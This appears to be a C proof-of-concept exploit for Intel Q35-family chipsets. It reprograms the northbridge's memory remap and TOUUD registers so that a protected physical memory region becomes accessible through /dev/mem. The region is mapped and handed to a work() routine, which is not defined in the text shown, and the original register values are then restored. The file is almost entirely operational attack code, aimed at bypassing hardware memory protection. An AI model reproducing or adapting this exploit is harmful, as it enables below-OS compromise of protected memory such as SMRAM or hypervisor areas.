#include <stdio.h>
#include <stdlib.h>
#include <pci/pci.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define __NR_mmap2              192
#include <syscall.h>
#include <signal.h>
//  _syscall6(void*, mmap2, unsigned long, addr, unsigned long, len, unsigned long,
//          prot, unsigned long, flags, unsigned long, fd, unsigned long, pgoff);


// the following values are for Intel Q35 northbridges
#define REMAP_BASE_OFFSET 0x98
#define REMAP_LIMIT_OFFSET 0x9a
#define TOUUD_OFFSET 0xa2
#define BUF_SIZE 0x1000000

u64 target_phys_area = 0x7f000000;
u64 target_phys_area_off = 0;

int main()
{

	struct pci_access *pci;
	struct pci_dev *dev;

	u16 remap_base, remap_limit;
	u64 reclaim_base, reclaim_limit, reclaim_sz, reclaim_mapped_to,
	    reclaim_off;
	u16 tom, tolud, tolud_test, touud, touud_test;
	u8 smram;
	u32 tsegmb, gbsm, bgsm, bsm;
	u8 esmramc;
	int fdmem, fdbuf;
	void *memmap;
	int i;


	if (iopl(3) < 0)
		perror("iopl(3)");

	pci = pci_alloc();
	pci_init(pci);
	dev = pci_get_dev(pci, 0, 0, 0, 0);
	if (!dev)
		perror("pci_get_dev()");
	pci_fill_info(dev, PCI_FILL_IDENT);


	if (!(dev->vendor_id == 0x8086 && (dev->device_id == 0x29b0	/* 82Q35 GMCH */
					   || dev->device_id == 0x29c0	/* 82G33/82P35 (G)MCH */
					   || dev->device_id == 0x29d0))) {	/* 82Q33 GMCH */
		printf
		    ("This exploit is for Q35-family of Intel chipsets only!\n");
		return 0;
	}


	remap_base = pci_read_word(dev, REMAP_BASE_OFFSET);
	remap_limit = pci_read_word(dev, REMAP_LIMIT_OFFSET);

	touud = pci_read_word(dev, TOUUD_OFFSET);

	u16 new_remap_base = 0x40, new_remap_limit = 0x60;
	reclaim_base = (u64) new_remap_base << 26;
	reclaim_limit = ((u64) new_remap_limit << 26) + 0x3ffffff;
	reclaim_sz = reclaim_limit - reclaim_base;
	reclaim_mapped_to = 0xffffffff - reclaim_sz;
	reclaim_off = target_phys_area - reclaim_mapped_to;

	pci_write_word(dev, TOUUD_OFFSET, (new_remap_limit + 1) << 6);
	touud_test = pci_read_word(dev, TOUUD_OFFSET);
	printf("touud      = %#llx (%#x))\n", (u64) touud_test << 20,
	       touud_test);

	pci_write_word(dev, REMAP_BASE_OFFSET, new_remap_base);
	pci_write_word(dev, REMAP_LIMIT_OFFSET, new_remap_limit);

	fdmem = open("/dev/mem", O_RDWR);
	if (fdmem < 0)
		perror("opem(/dev/mem)");
	memmap =
	    (void *) syscall(192, NULL, BUF_SIZE, PROT_READ | PROT_WRITE,
			     MAP_SHARED, fdmem,
			     (reclaim_base + reclaim_off) / 4096);
	if (memmap == MAP_FAILED)
		perror("mmap()");
	work(memmap);
	munmap(memmap, BUF_SIZE);
	close(fdmem);

	pci_write_word(dev, REMAP_BASE_OFFSET, remap_base);
	pci_write_word(dev, REMAP_LIMIT_OFFSET, remap_limit);
	printf("restoring touud = %#x\n", touud);
	pci_write_word(dev, TOUUD_OFFSET, touud);

	pci_cleanup(pci);
	return 0;
}
